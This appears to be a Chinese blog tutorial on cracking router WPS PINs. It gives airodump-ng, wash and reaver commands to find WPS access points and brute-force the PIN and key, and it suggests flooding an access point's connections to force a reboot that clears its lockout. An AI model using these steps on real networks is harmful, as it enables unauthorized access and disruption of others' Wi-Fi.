最新消息:

(七)无线渗透之WPS破解

Kali Linux Eternal 5020浏览 0评论

WPS原本是为了使用的安全和方便而设计的,但是却被安全专家爆出存在可被利用的缺陷。即接入方可以通过返回值来判断 pin 码前四位的正确与否,而后四位的最后一位是 checksum 。由于其本身的八位 PIN码分为两段,因此我们只要理论尝试11000次就可以轻松破解出 PIN 码,从而进一步获取到 PSK 。

同样将网卡置入为侦听模式,这里不多说了。下面我们来查查附近有无支持WPS的路由器。

airodump-ng waln0mon –wps

我们还可以使用如下命令进行WPS的侦测。

wash -C -i wlan0mon

从结果我们可以看到,目前有三个AP都支持WPS。

接着我们就可以使用 reaver 来进行PIN码的爆破了。

reaver -i wlan0mon -b 14xxxxxxxxx56 -vv -c 11

当我们成功获取PIN码后,我们就可以使用如下命令来进行PSK共享秘钥的破解了!

reaver -i wlan0mon -b 14xxxxxxxxx56 -vv -c 11 -p 88888888

注意:在以上操作很有可能触发实现锁定机制的路由器。一旦锁定,我们将无法进行破解!一旦触发锁定,我们可以耗尽AP连接数,使其重启,从而解开锁定!

原创文章,转载请注明来源!即刻安全(secist.com)

文章地址:http://www.secist.com/?p=115&preview=true

转载请注明:即刻安全 » (七)无线渗透之WPS破解

您必须 登录 才能发表评论!



合作伙伴